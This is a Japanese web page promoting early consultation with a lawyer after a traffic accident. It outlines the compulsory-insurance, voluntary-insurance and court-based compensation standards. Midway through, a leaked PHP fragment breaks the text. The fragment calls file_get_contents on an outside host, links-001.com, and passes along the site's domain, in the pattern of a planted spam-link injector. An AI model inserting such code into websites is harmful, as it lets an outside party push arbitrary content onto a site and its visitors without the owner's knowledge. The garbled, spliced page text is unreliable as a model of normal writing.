前へ
次へ

交通事故に遭ったら弁護士に相談しよう

自動車と接触したなどの交通事故に遭った場合は、弁護士に相談するのが最適です。
なぜ弁護士に相談するのがいいのかというと、示談交渉のプロである弁護士に任せれば慰謝料を増額できるかもしれないからです。
他にも治療中の時から適切なアドバイスをもらうことができるので、スムーズに慰謝料を受け取ることができます。
交通事故の慰謝料の基準はどのようになっているかというと、自賠責保険基準や任意保険基準、裁判所基準の3つがあります。
自賠責保険基準は自動車損害賠償保障法によって定められている保険基準で、必ず受け取ることができますが3つの基準の中で一番金額が低いです。
任意保険基準は、任意保険会社が独自に設定している保険基準で、保険会社ごとにその金額は異なります。
任意保険基準は、自賠責保険よりも金額が高いですが、裁判所基準よりは低いという、ちょうど中間の位置にあります。
裁判所基準は過去の裁判の判例によって金額が決まるという特徴があり、3つの中で一番高い基準であるといえます。
交通事故について弁護士に相談しようと思っているのであれば、早めに相談することをおすすめします。
なぜ早めに弁護士に相談するのがいいのかというと、どのように対応したらいいのかのアドバイスを受けることができるからです。
また示談交渉も自分自身ではなく弁護士が保険会社と行ってくれるので、治療に専念することができ精神的な負担も軽減することができます。
このようなメリットがあるので、事故に遭ったらなるべく早い段階で弁護士に相談するようにしましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

自動車事故の示談を弁護士に相談したいのであれば、交通事故専門の弁護士に相談するのがいいでしょう。
専門の弁護士に相談すれば、保険会社が提示した保険金額が適正であるかをしっかりと計算してくれるからです。
一人一人の事故の状況に合わせて計算してくれるので、思っていたより高い慰謝料を請求することもできます。
また計算結果が出てくるのが早いという特徴もあります。

Page Top